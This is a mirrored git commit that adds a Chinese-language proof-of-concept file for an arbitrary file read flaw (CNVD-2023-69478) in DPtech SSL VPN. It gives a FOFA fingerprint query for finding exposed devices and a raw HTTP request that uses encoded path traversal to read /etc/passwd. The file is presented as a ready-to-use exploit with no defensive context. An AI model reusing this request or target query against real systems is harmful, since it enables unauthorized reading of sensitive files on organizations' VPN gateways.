mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 迪普DPTech VPN 任意文件读取.md
This commit is contained in:
parent
179931864b
commit
6fd3903ba9
23
迪普DPTech VPN 任意文件读取.md
Normal file
23
迪普DPTech VPN 任意文件读取.md
Normal file
@ -0,0 +1,23 @@
|
|||||||
|
## 迪普DPTech VPN 任意文件读取 CNVD-2023-69478
|
||||||
|
杭州迪普科技股份有限公司DPtech SSL VPN存在任意文件读取漏洞,攻击者可利用该漏洞获敏感信息。
|
||||||
|
|
||||||
|
## 漏洞影响产品
|
||||||
|
杭州迪普科技股份有限公司DPtech SSL VPN
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
title=="SSL VPN Service" && header="Dptech" || cert="DPtechCa"
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
|
||||||
|
Host: xxxxxxxxx
|
||||||
|
Cookie: SSLVPN_lang=1
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
|
||||||
|
se
|
||||||
|
```
|
||||||
|
## 漏洞复现
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
Loading…
x
Reference in New Issue
Block a user